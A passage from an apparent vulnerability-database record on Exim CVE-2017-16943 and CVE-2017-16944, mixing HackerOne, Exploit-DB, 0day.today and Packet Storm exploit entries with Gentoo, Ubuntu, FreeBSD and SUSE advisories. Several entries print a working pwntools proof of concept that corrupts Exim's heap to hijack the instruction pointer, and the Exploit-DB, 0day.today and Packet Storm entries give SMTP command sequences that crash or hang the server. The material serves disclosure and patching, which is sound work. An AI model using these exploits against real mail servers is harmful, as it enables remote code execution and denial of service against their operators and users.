`store_get` to retrieve a bigger store and then releases the old one. This repeats many times if the data is long enough. Therefore, we have a big chunk in unsortbin.\n2. End DATA transfer and start a new email\n Restart to send an email with BDAT command after the heap chunk is prepared.\n3. Adjust `yield_length` again\n Send invalid command with an unprintable charater again to cut the `current_block`.\n\nFinally the heap layout is like:\n\n\nAnd now we can go back to the step 2 at the beginning and create the same situation. When `next->text` is freed, it goes back to unsortbin and we are able to overwrite libc global variables again.\nThe following is the PoC for default configured exim:\n```python\n# CVE-2017-16943 PoC by meh at DEVCORE\n# pip install pwntools\nfrom pwn import *\n\nr = remote('localhost', 25)\n\nr.recvline()\nr.sendline(\"EHLO test\")\nr.recvuntil(\"250 HELP\")\nr.sendline(\"MAIL FROM:<>\")\nr.recvline()\nr.sendline(\"RCPT TO:<meh@some.domain>\")\nr.recvline()\nr.sendline('a'*0x1280+'\\x7f')\nr.recvuntil('command')\nr.sendline('DATA')\nr.recvuntil('itself\\r\\n')\nr.sendline('b'*0x4000+':\\r\\n')\nr.sendline('.\\r\\n')\nr.sendline('.\\r\\n')\nr.recvline()\nr.sendline(\"MAIL FROM:<>\")\nr.recvline()\nr.sendline(\"RCPT TO:<meh@some.domain>\")\nr.recvline()\nr.sendline('a'*0x3480+'\\x7f')\nr.recvuntil('command')\nr.sendline('BDAT 1')\nr.sendline(':BDAT \\x7f')\ns = 'a'*6 + p64(0xdeadbeef)*(0x1e00/8)\nr.send(s+ ':\\r\\n')\nr.send('\\n')\nr.interactive()\n```\n\nA demo of our exploit is as below.\n\nNote that we have not found a way to leak memory address and therefore we use heap spray instead. It requires another information leakage vulnerability to overcome the PIE mitigation on x86-64.\n\n## Impact\n\nRemote code execution on remote mail server, affecting over 500k mail servers.", "modified": "2019-11-12T23:45:11", "published": "2017-12-11T15:51:58", "id": "H1:296991", "href": "https://hackerone.com/reports/296991", "type": "hackerone", "title": "The Internet: Exim use-after-free vulnerability while reading mail header involving BDAT commands", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "gentoo": [{"lastseen": "2018-03-06T22:38:40", "bulletinFamily": "unix", "description": "### Background\n\nExim is a message transfer agent (MTA) designed to be a a highly configurable, drop-in replacement for sendmail. \n\n### Description\n\nMultiple vulnerabilities have been discovered in Exim. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA remote attacker, by connecting to the SMTP listener daemon, could possibly execute arbitrary code with the privileges of the process or cause a Denial of Service condition. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Exim users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=mail-mta/exim-4.90.1\"", "modified": "2018-03-06T00:00:00", "published": "2018-03-06T00:00:00", "href": "https://security.gentoo.org/glsa/201803-01", "id": "GLSA-201803-01", "title": "Exim: Multiple vulnerabilities", "type": "gentoo", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2017-11-27T21:01:07", "bulletinFamily": "exploit", "description": "Exim 4.89 - 'BDAT' Denial of Service. CVE-2017-16944. Dos exploit for Multiple platform. Tags: Denial of Service (DoS)", "modified": "2017-11-27T00:00:00", "published": "2017-11-27T00:00:00", "id": "EDB-ID:43184", "href": "https://www.exploit-db.com/exploits/43184/", "type": "exploitdb", "title": "Exim 4.89 - 'BDAT' Denial of Service", "sourceData": "While parsing BDAT data header, exim still scans for '.' and consider it the end of mail.\r\nhttps://github.com/Exim/exim/blob/master/src/src/receive.c#L1867\r\n\r\nExim goes into an incorrect state after this message is sent because the function pointer receive_getc is not reset. If the following command is also a BDAT, receive_getc and lwr_receive_getc become the same and an infinite loop occurs inside bdat_getc. Program crashes due to running out of stack.\r\nhttps://github.com/Exim/exim/blob/master/src/src/smtp_in.c#L547\r\n\r\nHere is a simple PoC which leads to an infinite loop and program crash:\r\n\r\nEHLO localhost\r\nMAIL FROM:<test@localhost>\r\nRCPT TO:<test@localhost>\r\nBDAT 10\r\n.\r\nBDAT 0\r\n\r\n\r\nPart of debug info\r\n============================\r\n15:36:54 30502 SMTP>> 250 0 byte chunk received\r\n15:36:54 30502 chunking state 0\r\n15:36:54 30502 SMTP>> 250 0 byte chunk received\r\n15:36:54 30502 chunking state 0\r\n15:36:54 30502 SMTP>> 250 0 byte chunk received\r\n15:36:54 30502 chunking state 0\r\n15:36:54 30502 SMTP>> 250 0 byte chunk received\r\n15:36:54 30502 chunking state 0\r\n15:36:54 30502 SMTP>> 250 0 byte chunk received\r\n15:36:54 30502 chunking state 0\r\n15:36:54 30502 SMTP>> 250 0 byte chunk received\r\n15:36:54 30502 chunking state 0\r\n15:36:54 30502 SMTP>> 250 0 byte chunk received\r\n15:36:54 30502 chunking state 0\r\n15:36:54 30502 SMTP>> 250 0 byte chunk received\r\n15:36:54 30502 chunking state 0\r\n15:36:54 30502 SMTP>> 250 0 byte chunk received\r\n15:36:54 30502 chunking state 0\r\n15:36:54 30295 child 30502 ended: status=0x8b\r\n15:36:54 30295 signal exit, signal 11 (core dumped)\r\n15:36:54 30295 1 SMTP accept process now running\r\n15:36:54 30295 Listening...\r\n============================\r\n\r\nWe also found that this vulnerability can make exim hang(go into an infinite loop without crashing and run forever) even the connection is closed. It seems like this can be used to raise a resource based DoS attack.\r\nThis can be triggered using the following command:\r\n\r\nEHLO localhost\r\nMAIL FROM:<test@localhost>\r\nRCPT TO:<test@localhost>\r\nBDAT 100\r\n.\r\nMAIL FROM:<test@localhost>\r\nRCPT TO:<test@localhost>\r\nBDAT 0 LAST\r\n\r\n// Tested on current master, ubuntu16.04.", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/43184/"}], "zdt": [{"lastseen": "2018-03-20T05:15:06", "bulletinFamily": "exploit", "description": "Exploit for multiple platform in category dos / poc", "modified": "2017-11-27T00:00:00", "published": "2017-11-27T00:00:00", "href": "https://0day.today/exploit/description/29068", "id": "1337DAY-ID-29068", "title": "Exim 4.89 - BDAT Denial of Service Exploit", "type": "zdt", "sourceData": "While parsing BDAT data header, exim still scans for '.' and consider it the end of mail.\r\nhttps://github.com/Exim/exim/blob/master/src/src/receive.c#L1867\r\n \r\nExim goes into an incorrect state after this message is sent because the function pointer receive_getc is not reset. If the following command is also a BDAT, receive_getc and lwr_receive_getc become the same and an infinite loop occurs inside bdat_getc. Program crashes due to running out of stack.\r\nhttps://github.com/Exim/exim/blob/master/src/src/smtp_in.c#L547\r\n \r\nHere is a simple PoC which leads to an infinite loop and program crash:\r\n \r\nEHLO localhost\r\nMAIL FROM:<[email\u00a0protected]>\r\nRCPT TO:<[email\u00a0protected]>\r\nBDAT 10\r\n.\r\nBDAT 0\r\n \r\n \r\nPart of debug info\r\n============================\r\n15:36:54 30502 SMTP>> 250 0 byte chunk received\r\n15:36:54 30502 chunking state 0\r\n15:36:54 30502 SMTP>> 250 0 byte chunk received\r\n15:36:54 30502 chunking state 0\r\n15:36:54 30502 SMTP>> 250 0 byte chunk received\r\n15:36:54 30502 chunking state 0\r\n15:36:54 30502 SMTP>> 250 0 byte chunk received\r\n15:36:54 30502 chunking state 0\r\n15:36:54 30502 SMTP>> 250 0 byte chunk received\r\n15:36:54 30502 chunking state 0\r\n15:36:54 30502 SMTP>> 250 0 byte chunk received\r\n15:36:54 30502 chunking state 0\r\n15:36:54 30502 SMTP>> 250 0 byte chunk received\r\n15:36:54 30502 chunking state 0\r\n15:36:54 30502 SMTP>> 250 0 byte chunk received\r\n15:36:54 30502 chunking state 0\r\n15:36:54 30502 SMTP>> 250 0 byte chunk received\r\n15:36:54 30502 chunking state 0\r\n15:36:54 30295 child 30502 ended: status=0x8b\r\n15:36:54 30295 signal exit, signal 11 (core dumped)\r\n15:36:54 30295 1 SMTP accept process now running\r\n15:36:54 30295 Listening...\r\n============================\r\n \r\nWe also found that this vulnerability can make exim hang(go into an infinite loop without crashing and run forever) even the connection is closed. It seems like this can be used to raise a resource based DoS attack.\r\nThis can be triggered using the following command:\r\n \r\nEHLO localhost\r\nMAIL FROM:<[email\u00a0protected]>\r\nRCPT TO:<[email\u00a0protected]>\r\nBDAT 100\r\n.\r\nMAIL FROM:<[email\u00a0protected]>\r\nRCPT TO:<[email\u00a0protected]>\r\nBDAT 0 LAST\r\n \r\n// Tested on current master, ubuntu16.04.\n\n# 0day.today [2018-03-20] #", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/29068"}, {"lastseen": "2018-01-09T15:16:49", "bulletinFamily": "exploit", "description": "Exploit for multiple platform in category dos / poc", "modified": "2017-11-30T00:00:00", "published": "2017-11-30T00:00:00", "href": "https://0day.today/exploit/description/29082", "id": "1337DAY-ID-29082", "type": "zdt", "title": "Exim Use-After-Free Exploit", "sourceData": "On 25 November 2017 Phil Pennock announced the new release of Exim which included a fix for a use-after-free vulnerability which can result in Remote Code Execution (RCE). The vulnerability was reported by a user with the handle \u201cmeh\u201d and it all starts in receive.c.\r\n\r\nBOOL\r\nreceive_msg(BOOL extract_recip)\r\n{\r\n ...\r\n /* See if we are at the current header's size limit - there must be at least\r\n four bytes left. This allows for the new character plus a zero, plus two for\r\n extra insertions when we are playing games with dots and carriage returns. If\r\n we are at the limit, extend the text buffer. This could have been done\r\n automatically using string_cat() but because this is a tightish loop storing\r\n only one character at a time, we choose to do it inline. Normally\r\n store_extend() will be able to extend the block; only at the end of a big\r\n store block will a copy be needed. To handle the case of very long headers\r\n (and sometimes lunatic messages can have ones that are 100s of K long) we\r\n call store_release() for strings that have been copied - if the string is at\r\n the start of a block (and therefore the only thing in it, because we aren't\r\n doing any other gets), the block gets freed. We can only do this because we\r\n know there are no other calls to store_get() going on. */\r\n\r\n if (ptr >= header_size - 4)\r\n {\r\n int oldsize = header_size;\r\n /* header_size += 256; */\r\n header_size *= 2;\r\n if (!store_extend(next->text, oldsize, header_size))\r\n {\r\n uschar *newtext = store_get(header_size);\r\n memcpy(newtext, next->text, ptr);\r\n store_release(next->text);\r\n next->text = newtext;\r\n }\r\n }\r\n ...\r\n}\r\n\r\nThe above function is used to parse the received messages and the specific snippet is related to the buffer that stores the header. If the header is too small the code will use store_extend() which will try to resize \u201cnext->text\u201d from \u201coldsize\u201d to \u201cheader_size\u201d. As the original reporter noticed, store_extend() will fail if there is some other allocation between the allocation and the extension. This can be seen at store.c file as you can see below.\r\n\r\nBOOL\r\nstore_extend_3(void *ptr, int oldsize, int newsize, const char *filename,\r\n int linenumber)\r\n{\r\nint inc = newsize - oldsize;\r\nint rounded_oldsize = oldsize;\r\n\r\nif (rounded_oldsize % alignment != 0)\r\n rounded_oldsize += alignment - (rounded_oldsize % alignment);\r\n\r\nif (CS ptr + rounded_oldsize != CS (next_yield[store_pool]) ||\r\n inc > yield_length[store_pool] + rounded_oldsize - oldsize)\r\n return FALSE;\r\n ...\r\n}\r\n\r\nIf we go back to the receive_msg() we will see that store_get() is called passing the \u201cheader_size\u201d to it, if we look this function in store.c we will see that it actually splits the current block.\r\n\r\nvoid *\r\nstore_get_3(int size, const char *filename, int linenumber)\r\n{\r\n ...\r\n(void) VALGRIND_MAKE_MEM_UNDEFINED(store_last_get[store_pool], size);\r\n/* Update next pointer and number of bytes left in the current block. */\r\n\r\nnext_yield[store_pool] = (void *)(CS next_yield[store_pool] + size);\r\nyield_length[store_pool] -= size;\r\n\r\nreturn store_last_get[store_pool];\r\n\r\nThe next function being invoked by receive_msg() is the store_release() which as it is implied by its name it will try to release \u201cnext->text\u201d which however still points to the whole block. This means that subsequent uses of this buffer result in a use-after-free scenario. Below you can see the store_release() function as defined in store.c.\r\n\r\nvoid\r\nstore_release_3(void *block, const char *filename, int linenumber)\r\n{\r\nstoreblock *b;\r\n\r\n/* It will never be the first block, so no need to check that. */\r\n\r\nfor (b = chainbase[store_pool]; b != NULL; b = b->next)\r\n {\r\n storeblock *bb = b->next;\r\n if (bb != NULL && CS block == CS bb + ALIGNED_SIZEOF_STOREBLOCK)\r\n {\r\n b->next = bb->next;\r\n pool_malloc -= bb->length + ALIGNED_SIZEOF_STOREBLOCK;\r\n\r\n /* Cut out the debugging stuff for utilities, but stop picky compilers\r\n from giving warnings. */\r\n\r\n #ifdef COMPILE_UTILITY\r\n filename = filename;\r\n linenumber = linenumber;\r\n #else\r\n DEBUG(D_memory)\r\n {\r\n if (running_in_test_harness)\r\n debug_printf(\"-Release %d\\n\", pool_malloc);\r\n else\r\n debug_printf(\"-Release %6p %-20s %4d %d\\n\", (void *)bb, filename,\r\n linenumber, pool_malloc);\r\n }\r\n if (running_in_test_harness)\r\n memset(bb, 0xF0, bb->length+ALIGNED_SIZEOF_STOREBLOCK);\r\n #endif /* COMPILE_UTILITY */\r\n\r\n free(bb);\r\n return;\r\n }\r\n }\r\n}\r\n\r\nTo fix this vulnerability, Jeremy Harris introduced the following patch which introduces \u201crelease_ok\u201d that checks that \u201cstore_last_get[store_pool]\u201d points to the same location as \u201cnext->text\u201d before proceeding with the store_release() invocation.\r\n\r\n if (!store_extend(next->text, oldsize, header_size))\r\n {\r\n+ BOOL release_ok = store_last_get[store_pool] == next->text;\r\n uschar *newtext = store_get(header_size);\r\n memcpy(newtext, next->text, ptr);\r\n- store_release(next->text);\r\n+ if (release_ok) store_release(next->text);\r\n next->text = newtext;\r\n\r\nTo prove the exploitability of this vulnerability, \u201cmeh\u201d uploaded a Python Proof-of-Concept exploit that manages to overwrite the instruction pointer with 0xdeadbeef on Ubuntu 16.04 with the latest release of Exim. You can see the Python PoC exploit below.\r\n\r\n# pip install pwntools\r\nfrom pwn import *\r\n\r\nr = remote('127.0.0.1', 25)\r\n\r\nr.recvline()\r\nr.sendline(\"EHLO test\")\r\nr.recvuntil(\"250 HELP\")\r\nr.sendline(\"MAIL FROM:<[email\u00a0protected]>\")\r\nr.recvline()\r\nr.sendline(\"RCPT TO:<[email\u00a0protected]>\")\r\nr.recvline()\r\nr.sendline('a'*0x1250+'\\x7f')\r\nr.recvuntil('command')\r\nr.sendline('BDAT 1')\r\nr.sendline(':BDAT \\x7f')\r\ns = 'a'*6 + p64(0xdeadbeef)*(0x1e00/8)\r\nr.send(s+ ':\\r\\n')\r\nr.recvuntil('command')\r\nr.send('\\n')\r\nr.interactive()\r\n\r\nWhat it does is initiating an SMTP connection via EHLO and then starting the structuring of an email. Then we see the strange \u201cr.sendline(\u2018a\u2019*0x1250+\u2019\\x7f\u2019)\u201d which is an unrecognized command and the exploit code uses to adjust the \u201cyield_length\u201d to be less 0x100. The subsequently command sets the length of BDAT to 1 and it is followed by one BDAT character that is non-printable which means that it will reach the previously set limit. The latter will result in invoking store_get(). While Exim is still trying to read the header in receive_msg(), the author if this PoC exploit sends the huge constructed message resulting in the header size vulnerability we described above. You can see the result of this (as shown by the PoC author) below.\r\n\r\nProgram received signal SIGSEGV, Segmentation fault.\r\n0x00000000deadbeef in ?? ()\r\n(gdb)\r\n\r\n\r\nPOC Exploit:\r\n\r\n# pip install pwntools\r\nfrom pwn import *\r\n \r\nr = remote('127.0.0.1', 25)\r\n \r\nr.recvline()\r\nr.sendline(\"EHLO test\")\r\nr.recvuntil(\"250 HELP\")\r\nr.sendline(\"MAIL FROM:<[email\u00a0protected]>\")\r\nr.recvline()\r\nr.sendline(\"RCPT TO:<[email\u00a0protected]>\")\r\nr.recvline()\r\nr.sendline('a'*0x1250+'\\x7f')\r\nr.recvuntil('command')\r\nr.sendline('BDAT 1')\r\nr.sendline(':BDAT \\x7f')\r\ns = 'a'*6 + p64(0xdeadbeef)*(0x1e00/8)\r\nr.send(s+ ':\\r\\n')\r\nr.recvuntil('command')\r\nr.send('\\n')\r\nr.interactive()\r\n\r\n\r\nSource\r\nhttps://xorl.wordpress.com/2017/11/26/cve-2017-16943-exim-use-after-free/\r\n\n\n# 0day.today [2018-01-09] #", "sourceHref": "https://0day.today/exploit/29082", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "packetstorm": [{"lastseen": "2017-12-01T06:03:25", "bulletinFamily": "exploit", "description": "", "modified": "2017-11-27T00:00:00", "published": "2017-11-27T00:00:00", "href": "https://packetstormsecurity.com/files/145152/Exim-4.89-Denial-Of-Service.html", "id": "PACKETSTORM:145152", "type": "packetstorm", "title": "Exim 4.89 Denial Of Service", "sourceData": "`While parsing BDAT data header, exim still scans for '.' and consider it the end of mail. \nhttps://github.com/Exim/exim/blob/master/src/src/receive.c#L1867 \n \nExim goes into an incorrect state after this message is sent because the function pointer receive_getc is not reset. If the following command is also a BDAT, receive_getc and lwr_receive_getc become the same and an infinite loop occurs inside bdat_getc. Program crashes due to running out of stack. \nhttps://github.com/Exim/exim/blob/master/src/src/smtp_in.c#L547 \n \nHere is a simple PoC which leads to an infinite loop and program crash: \n \nEHLO localhost \nMAIL FROM:<test@localhost> \nRCPT TO:<test@localhost> \nBDAT 10 \n. \nBDAT 0 \n \n \nPart of debug info \n============================ \n15:36:54 30502 SMTP>> 250 0 byte chunk received \n15:36:54 30502 chunking state 0 \n15:36:54 30502 SMTP>> 250 0 byte chunk received \n15:36:54 30502 chunking state 0 \n15:36:54 30502 SMTP>> 250 0 byte chunk received \n15:36:54 30502 chunking state 0 \n15:36:54 30502 SMTP>> 250 0 byte chunk received \n15:36:54 30502 chunking state 0 \n15:36:54 30502 SMTP>> 250 0 byte chunk received \n15:36:54 30502 chunking state 0 \n15:36:54 30502 SMTP>> 250 0 byte chunk received \n15:36:54 30502 chunking state 0 \n15:36:54 30502 SMTP>> 250 0 byte chunk received \n15:36:54 30502 chunking state 0 \n15:36:54 30502 SMTP>> 250 0 byte chunk received \n15:36:54 30502 chunking state 0 \n15:36:54 30502 SMTP>> 250 0 byte chunk received \n15:36:54 30502 chunking state 0 \n15:36:54 30295 child 30502 ended: status=0x8b \n15:36:54 30295 signal exit, signal 11 (core dumped) \n15:36:54 30295 1 SMTP accept process now running \n15:36:54 30295 Listening... \n============================ \n \nWe also found that this vulnerability can make exim hang(go into an infinite loop without crashing and run forever) even the connection is closed. It seems like this can be used to raise a resource based DoS attack. \nThis can be triggered using the following command: \n \nEHLO localhost \nMAIL FROM:<test@localhost> \nRCPT TO:<test@localhost> \nBDAT 100 \n. \nMAIL FROM:<test@localhost> \nRCPT TO:<test@localhost> \nBDAT 0 LAST \n \n// Tested on current master, ubuntu16.04. \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/145152/exim489-dos.txt", "cvss": {"score": 0.0, "vector": "NONE"}}], "ubuntu": [{"lastseen": "2019-05-29T19:21:04", "bulletinFamily": "unix", "description": "It was discovered that Exim incorrectly handled certain BDAT data headers. A remote attacker could possibly use this issue to cause Exim to crash, resulting in a denial of service.", "modified": "2017-11-29T00:00:00", "published": "2017-11-29T00:00:00", "id": "USN-3499-1", "href": "https://usn.ubuntu.com/3499-1/", "title": "Exim vulnerability", "type": "ubuntu", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T19:21:38", "bulletinFamily": "unix", "description": "It was discovered that Exim incorrectly handled memory in the ESMTP CHUNKING extension. A remote attacker could use this issue to cause Exim to crash, resulting in a denial of service, or possibly execute arbitrary code. The default compiler options for affected releases should reduce the vulnerability to a denial of service.", "modified": "2017-11-27T00:00:00", "published": "2017-11-27T00:00:00", "id": "USN-3493-1", "href": "https://usn.ubuntu.com/3493-1/", "title": "Exim vulnerability", "type": "ubuntu", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "freebsd": [{"lastseen": "2019-05-29T18:32:05", "bulletinFamily": "unix", "description": "\nExim developers team reports:\n\nThe receive_msg function in receive.c in the SMTP daemon in Exim 4.88 and 4.89 allows remote attackers to cause a denial of service (infinite loop and stack exhaustion) via vectors involving BDAT commands and an improper check for a '.' character signifying the end of the content, related to the bdat_getc function.\n\n", "modified": "2017-11-23T00:00:00", "published": "2017-11-23T00:00:00", "id": "75DD622C-D5FD-11E7-B9FE-C13EB7BCBF4F", "href": "https://vuxml.freebsd.org/freebsd/75dd622c-d5fd-11e7-b9fe-c13eb7bcbf4f.html", "title": "exim -- remote DoS attack in BDAT processing", "type": "freebsd", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "suse": [{"lastseen": "2017-12-06T07:02:59", "bulletinFamily": "unix", "description": "This update for exim fixes the following issues:\n\n Security issue fixed:\n\n - CVE-2017-16943: Fix possible remote code execution (boo#1069857).\n\n", "modified": "2017-12-06T03:08:53", "published": "2017-12-06T03:08:53", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-12/msg00009.html", "id": "OPENSUSE-SU-2017:3220-1", "title": "Security update for exim (important)", "type": "suse", "cvss": {"score": 0.0, "vector": "NONE"}}]}